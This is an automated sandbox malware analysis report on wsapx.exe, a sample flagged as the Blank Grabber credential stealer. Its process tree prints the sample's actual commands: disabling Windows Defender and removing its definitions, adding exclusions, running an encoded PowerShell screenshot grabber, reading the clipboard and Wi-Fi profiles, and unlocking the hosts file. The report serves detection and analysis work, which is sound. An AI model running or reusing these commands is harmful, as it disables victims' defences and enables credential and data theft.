Edit tour

Windows Analysis Report
wsapx.exe

Overview

General Information

Sample name:	wsapx.exe
Analysis ID:	1574324
MD5:	e302186ae6217d48fc6eef1fe780ec26
SHA1:	17fcd5699fc208e8b520eb9ad1c0b4a0305a5f0a
SHA256:	3ca3e36031f8b7128739c85e0f1bab4a178a4546af60142851d1ba42f3bd0672
Tags:	exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

wsapx.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\wsapx.exe" MD5: E302186AE6217D48FC6EEF1FE780EC26)

wsapx.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\wsapx.exe" MD5: E302186AE6217D48FC6EEF1FE780EC26)

cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7676 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7664 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 420 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7720 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7768 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7892 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8156 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4176 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2436 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5644 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6812 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7020 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2784 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5644 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7232 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8036 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3192 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8044 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 800 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 6852 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7452 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 3416 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 2688 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7892 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5328 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 3192 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 1224 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

